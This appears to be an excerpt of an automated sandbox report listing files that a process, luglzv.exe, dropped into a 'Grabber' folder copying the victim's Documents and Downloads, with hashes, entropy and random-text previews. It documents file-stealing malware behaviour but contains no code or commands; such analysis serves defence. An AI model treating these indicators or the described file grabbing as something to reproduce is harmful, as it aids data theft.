                                                                  SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                  MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                  SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                  SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                  SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                  Malicious:false
                                                                  Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\desktop.ini

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):402
                                                                  Entropy (8bit):3.493087299556618
                                                                  Encrypted:false
                                                                  SSDEEP:12:QZsiL5wmHOlDmo0qmUclLwr2FlDmo0IWF9klrgl2FlDmo0qjKAev:QCGwv4o0hlLwiF4o0UUsF4o01AM
                                                                  MD5:ECF88F261853FE08D58E2E903220DA14
                                                                  SHA1:F72807A9E081906654AE196605E681D5938A2E6C
                                                                  SHA-256:CAFEC240D998E4B6E92AD1329CD417E8E9CBD73157488889FD93A542DE4A4844
                                                                  SHA-512:82C1C3DD163FBF7111C7EF5043B009DAFC320C0C5E088DEC16C835352C5FFB7D03C5829F65A9FF1DC357BAE97E8D2F9C3FC1E531FE193E84811FB8C62888A36B
                                                                  Malicious:false
                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.2.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.5.....

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\HTAGVDFUIE.png

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.692693183518806
                                                                  Encrypted:false
                                                                  SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                  MD5:78F042E25B7FAF970F75DFAA81955268
                                                                  SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                  SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                  SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                  Malicious:false
                                                                  Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\HTAGVDFUIE.xlsx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.692693183518806
                                                                  Encrypted:false
                                                                  SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                  MD5:78F042E25B7FAF970F75DFAA81955268
                                                                  SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                  SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                  SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                  Malicious:false
                                                                  Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\KATAXZVCPS.docx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\KATAXZVCPS.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\KZWFNRXYKI.png

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.694982189683734
                                                                  Encrypted:false
                                                                  SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                  MD5:E49F84B05A175C231342E6B705A24A44
                                                                  SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                  SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                  SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                  Malicious:false
                                                                  Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\LTKMYBSEYZ.pdf

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.687722658485212
                                                                  Encrypted:false
                                                                  SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                  MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                  SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                  SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                  SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                  Malicious:false
                                                                  Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\LTKMYBSEYZ.xlsx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.687722658485212
                                                                  Encrypted:false
                                                                  SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                  MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                  SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                  SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                  SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                  Malicious:false
                                                                  Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\ONBQCLYSPU.docx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699434772658264
                                                                  Encrypted:false
                                                                  SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                  MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                  SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                  SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                  SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                  Malicious:false
                                                                  Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\RAYHIWGKDI.png

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.69782189124949
                                                                  Encrypted:false
                                                                  SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                                  MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                                  SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                                  SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                                  SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                                  Malicious:false
